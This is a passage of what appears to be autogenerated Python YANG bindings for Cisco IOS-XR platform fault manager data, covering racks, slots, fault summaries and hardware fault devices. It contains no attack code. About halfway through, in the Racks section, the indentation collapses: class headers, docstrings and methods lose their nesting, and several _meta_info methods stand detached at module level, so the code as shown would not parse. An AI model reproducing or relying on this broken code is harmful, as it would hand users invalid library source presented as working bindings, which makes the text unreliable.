                self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot))])
                self._leafs = OrderedDict()

                self.slot = YList(self)
                self._segment_path = lambda: "slots"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots, [], name, value)


            class Slot(_Entity_):
                """
                Name

                .. attribute:: slot  (key)

                    Slot name

                    **type**\: str

                    **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                    **config**\: False

                .. attribute:: fault_summary

                    Table of Hardware Summary

                    **type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary>`

                    **config**\: False

                .. attribute:: hardware_fault_devices

                    Table of Hardware Failure

                    **type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices>`

                    **config**\: False

                """

                _prefix = 'pfm-oper'
                _revision = '2017-03-28'

                def __init__(self):
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot, self).__init__()

                    self.yang_name = "slot"
                    self.yang_parent_name = "slots"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = ['slot']
                    self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
                    self._leafs = OrderedDict([
                        ('slot', (YLeaf(YType.str, 'slot'), ['str'])),
                    ])
                    self.slot = None

                    self.fault_summary = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary()
                    self.fault_summary.parent = self
                    self._children_name_map["fault_summary"] = "fault-summary"

                    self.hardware_fault_devices = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices()
                    self.hardware_fault_devices.parent = self
                    self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"

                    self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot, ['slot'], name, value)


                class FaultSummary(_Entity_):
                    """
                    Table of Hardware Summary

                    .. attribute:: severity_critical_count

                        Fault Severity Critical count

                        **type**\: int

                        **range:** \-2147483648..2147483647

                        **config**\: False

                    .. attribute:: severity_emergency_or_alert_count

                        Fault Severity Emergency count

                        **type**\: int

                        **range:** \-2147483648..2147483647

                        **config**\: False

                    .. attribute:: total

                        Faulty Hardware total count

                        **type**\: int

                        **range:** \-2147483648..2147483647

                        **config**\: False

                    .. attribute:: severity_error_count

                        Fault Severity Error count

                        **type**\: int

                        **range:** \-2147483648..2147483647

                        **config**\: False

                    """

                    _prefix = 'pfm-oper'
                    _revision = '2017-03-28'

                    def __init__(self):
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()

                        self.yang_name = "fault-summary"
                        self.yang_parent_name = "slot"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        # Leaf map: python name -> (YLeaf(yang type, yang name), python types).
                        self._leafs = OrderedDict([
                            ('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
                            ('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
                            ('total', (YLeaf(YType.int32, 'total'), ['int'])),
                            ('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
                        ])
                        self.severity_critical_count = None
                        self.severity_emergency_or_alert_count = None
                        self.total = None
                        self.severity_error_count = None
                        self._segment_path = lambda: "fault-summary"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)

                    @staticmethod
                    def _meta_info():
                        # Deferred import avoids loading the large meta table at module import time.
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
                        return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']


                class HardwareFaultDevices(_Entity_):
                    """
                    Table of Hardware Failure

                    .. attribute:: hardware_fault_device

                        Table of Hardware Failure Device

                        **type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`

                        **config**\: False

                    """

                    _prefix = 'pfm-oper'
                    _revision = '2017-03-28'

                    def __init__(self):
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()

                        self.yang_name = "hardware-fault-devices"
                        self.yang_parent_name = "slot"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
                        self._leafs = OrderedDict()

                        self.hardware_fault_device = YList(self)
                        self._segment_path = lambda: "hardware-fault-devices"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)


                    class HardwareFaultDevice(_Entity_):
                        """
                        Table of Hardware Failure Device

                        .. attribute:: hw_fault_device  (key)

                            hw fault device list

                            **type**\: str

                            **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                            **config**\: False

                        .. attribute:: hardware_fault_type

                            Table of Hardware Failure Type

                            **type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`

                            **config**\: False

                        """

                        _prefix = 'pfm-oper'
                        _revision = '2017-03-28'

                        def __init__(self):
                            if sys.version_info > (3,):
                                super().__init__()
                            else:
                                super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()

                            self.yang_name = "hardware-fault-device"
                            self.yang_parent_name = "hardware-fault-devices"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['hw_fault_device']
                            self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
                            self._leafs = OrderedDict([
                                ('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
                            ])
                            self.hw_fault_device = None

                            self.hardware_fault_type = YList(self)
                            self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)


                        class HardwareFaultType(_Entity_):
                            """
                            Table of Hardware Failure Type

                            .. attribute:: hw_fault_type  (key)

                                hw fault type list

                                **type**\: str

                                **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                                **config**\: False

                            .. attribute:: condition_description

                                Faulty Hardware Condition Description

                                **type**\: str

                                **config**\: False

                            .. attribute:: condition_name

                                Faulty Hardware Condition Name

                                **type**\: str

                                **config**\: False

                            .. attribute:: device_key

                                Faulty Hardware Device Key

                                **type**\: str

                                **config**\: False

                            .. attribute:: device_version

                                Faulty Hardware Device Version

                                **type**\: int

                                **range:** \-2147483648..2147483647

                                **config**\: False

                            .. attribute:: condition_raised_timestamp

                                Fault Raised Timestamp

                                **type**\: str

                                **config**\: False

                            .. attribute:: process_id

                                Faulty Hardware Process ID

                                **type**\: int

                                **range:** \-2147483648..2147483647

                                **config**\: False

                            .. attribute:: device_description

                                Faulty Hardware Device Description

                                **type**\: str

                                **config**\: False

                            .. attribute:: condition_severity

                                Faulty Hardware Condition Severity

                                **type**\: str

                                **config**\: False

                            """

                            _prefix = 'pfm-oper'
                            _revision = '2017-03-28'

                            def __init__(self):
                                if sys.version_info > (3,):
                                    super().__init__()
                                else:
                                    super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()

                                self.yang_name = "hardware-fault-type"
                                self.yang_parent_name = "hardware-fault-device"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['hw_fault_type']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
                                    ('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
                                    ('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
                                    ('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
                                    ('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
                                    ('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
                                    ('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
                                    ('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
                                    ('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
                                ])
                                self.hw_fault_type = None
                                self.condition_description = None
                                self.condition_name = None
                                self.device_key = None
                                self.device_version = None
                                self.condition_raised_timestamp = None
                                self.process_id = None
                                self.device_description = None
                                self.condition_severity = None
                                self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
                                self._is_frozen = True

                            def __setattr__(self, name, value):
                                self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)

                            @staticmethod
                            def _meta_info():
                                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
                                return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']

                        @staticmethod
                        def _meta_info():
                            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
                            return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
                        return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
                    return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot']['meta_info']

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
                return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
            return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
        return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks']['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the FaultType1 binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the FaultType1s binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the Exclude binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude']
    return entry['meta_info']
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # Python-2/3 compatible super() call emitted by the generator.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks, self).__init__()

    self.yang_name = "racks"
    self.yang_parent_name = "platform-fault-manager"
    self.is_top_level_class = False
    # No list ancestor: this container hangs directly off the top-level node,
    # so an absolute path can be computed (below).
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Maps YANG child node name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Racks.Rack))])
    self._leafs = OrderedDict()

    self.rack = YList(self)
    self._segment_path = lambda: "racks"
    self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/%s" % self._segment_path()
    # Must be assigned last: once frozen, writes go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the frozen-entity validator (no key leafs)."""
    key_leafs = []
    self._perform_setattr(PlatformFaultManager.Racks, key_leafs, name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # Python-2/3 compatible super() call emitted by the generator.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack, self).__init__()

    self.yang_name = "rack"
    self.yang_parent_name = "racks"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # 'rack' is the YANG list key for this entry.
    self.ylist_key_names = ['rack']
    self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Racks.Rack.Slots))])
    self._leafs = OrderedDict([
        ('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
    ])
    self.rack = None

    # Child container is instantiated eagerly and parented to self.
    self.slots = PlatformFaultManager.Racks.Rack.Slots()
    self.slots.parent = self
    self._children_name_map["slots"] = "slots"

    # Paths are lambdas so they always reflect the current key value.
    self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/racks/%s" % self._segment_path()
    # Must be assigned last: once frozen, writes go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the frozen-entity validator."""
    key_leafs = ['rack']
    self._perform_setattr(PlatformFaultManager.Racks.Rack, key_leafs, name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # Python-2/3 compatible super() call emitted by the generator.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack.Slots, self).__init__()

    self.yang_name = "slots"
    self.yang_parent_name = "rack"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Maps YANG child node name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Racks.Rack.Slots.Slot))])
    self._leafs = OrderedDict()

    self.slot = YList(self)
    self._segment_path = lambda: "slots"
    # Must be assigned last: once frozen, writes go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the frozen-entity validator (no key leafs)."""
    key_leafs = []
    self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots, key_leafs, name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # NOTE: YDK autogenerated code — initializes one entry of the YANG
    # list "slot", keyed by the 'slot' leaf, with two child containers.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack.Slots.Slot, self).__init__()
    self.yang_name = "slot"
    self.yang_parent_name = "slots"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['slot']
    self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
    self._leafs = OrderedDict([
        ('slot', (YLeaf(YType.str, 'slot'), ['str'])),
    ])
    self.slot = None  # key leaf: slot name
    # Instantiate and parent the two child containers.
    self.fault_summary = PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary()
    self.fault_summary.parent = self
    self._children_name_map["fault_summary"] = "fault-summary"
    self.hardware_fault_devices = PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices()
    self.hardware_fault_devices.parent = self
    self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
    # XPath segment includes the key predicate, e.g. slot[slot='0/RP0/CPU0'].
    self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
    self._is_frozen = True

def __setattr__(self, name, value):
    # Only the key leaf 'slot' is a settable data attribute.
    self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot, ['slot'], name, value)
class FaultSummary(_Entity_):
"""
Table of Hardware Summary
.. attribute:: severity_critical_count
Fault Severity Critical count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_emergency_or_alert_count
Fault Severity Emergency count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: total
Faulty Hardware total count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_error_count
Fault Severity Error count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # NOTE: YDK autogenerated code — initializes the leaf-only container
    # "fault-summary" holding per-slot fault counters.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
    self.yang_name = "fault-summary"
    self.yang_parent_name = "slot"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([])  # no child containers/lists
    self._leafs = OrderedDict([
        ('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
        ('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
        ('total', (YLeaf(YType.int32, 'total'), ['int'])),
        ('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
    ])
    # Counters are unset until populated from the device.
    self.severity_critical_count = None
    self.severity_emergency_or_alert_count = None
    self.total = None
    self.severity_error_count = None
    self._segment_path = lambda: "fault-summary"
    self._is_frozen = True

def __setattr__(self, name, value):
    # Validate writes against the declared counter leaves.
    self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)

@staticmethod
def _meta_info():
    # Lazy import avoids loading the large generated meta module unless
    # meta information is actually requested.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # NOTE: YDK autogenerated code — initializes the container
    # "hardware-fault-devices" wrapping the per-device fault list.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
    self.yang_name = "hardware-fault-devices"
    self.yang_parent_name = "slot"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
    self._leafs = OrderedDict()  # container has no leaves of its own
    self.hardware_fault_device = YList(self)
    self._segment_path = lambda: "hardware-fault-devices"
    self._is_frozen = True

def __setattr__(self, name, value):
    # No settable leaves on this container; validation list is empty.
    self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)
class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # NOTE: YDK autogenerated code — initializes one entry of the YANG
    # list "hardware-fault-device", keyed by 'hw-fault-device'.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
    self.yang_name = "hardware-fault-device"
    self.yang_parent_name = "hardware-fault-devices"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['hw_fault_device']
    self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
    self._leafs = OrderedDict([
        ('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
    ])
    self.hw_fault_device = None  # key leaf: faulty device name
    self.hardware_fault_type = YList(self)
    # XPath segment includes the key predicate.
    self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
    self._is_frozen = True

def __setattr__(self, name, value):
    # Only the key leaf 'hw_fault_device' is a settable data attribute.
    self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)
class HardwareFaultType(_Entity_):
"""
Table of Hardware Failure Type
.. attribute:: hw_fault_type (key)
hw fault type list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: condition_description
Faulty Hardware Condition Description
**type**\: str
**config**\: False
.. attribute:: condition_name
Faulty Hardware Condition Name
**type**\: str
**config**\: False
.. attribute:: device_key
Faulty Hardware Device Key
**type**\: str
**config**\: False
.. attribute:: device_version
Faulty Hardware Device Version
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: condition_raised_timestamp
Fault Raised Timestamp
**type**\: str
**config**\: False
.. attribute:: process_id
Faulty Hardware Process ID
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: device_description
Faulty Hardware Device Description
**type**\: str
**config**\: False
.. attribute:: condition_severity
Faulty Hardware Condition Severity
**type**\: str
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # NOTE: YDK autogenerated code — initializes one entry of the YANG
    # list "hardware-fault-type": details of a single hardware fault
    # condition, keyed by 'hw-fault-type'.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
    self.yang_name = "hardware-fault-type"
    self.yang_parent_name = "hardware-fault-device"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['hw_fault_type']
    self._child_classes = OrderedDict([])  # leaf-only list entry
    self._leafs = OrderedDict([
        ('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
        ('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
        ('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
        ('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
        ('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
        ('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
        ('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
        ('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
        ('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
    ])
    # Leaves are unset until populated from the device.
    self.hw_fault_type = None
    self.condition_description = None
    self.condition_name = None
    self.device_key = None
    self.device_version = None
    self.condition_raised_timestamp = None
    self.process_id = None
    self.device_description = None
    self.condition_severity = None
    # XPath segment includes the key predicate.
    self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
    self._is_frozen = True

def __setattr__(self, name, value):
    # Validate writes against all declared fault-detail leaves.
    self._perform_setattr(PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)

@staticmethod
def _meta_info():
    # Lazy import of the generated meta tables.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
# The following autogenerated _meta_info accessors close out each enclosing
# class in turn (HardwareFaultDevice, HardwareFaultDevices, Slot, Slots,
# Rack, Racks), followed by the top-level PlatformFaultManager methods.
# Each performs a lazy import of the generated meta tables and returns the
# meta-info record keyed by the class's fully qualified name.

# _meta_info for ...HardwareFaultDevices.HardwareFaultDevice
@staticmethod
def _meta_info():
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']

# _meta_info for ...Slot.HardwareFaultDevices
@staticmethod
def _meta_info():
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']

# _meta_info for ...Slots.Slot
@staticmethod
def _meta_info():
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    return meta._meta_table['PlatformFaultManager.Racks.Rack.Slots.Slot']['meta_info']

# _meta_info for ...Rack.Slots
@staticmethod
def _meta_info():
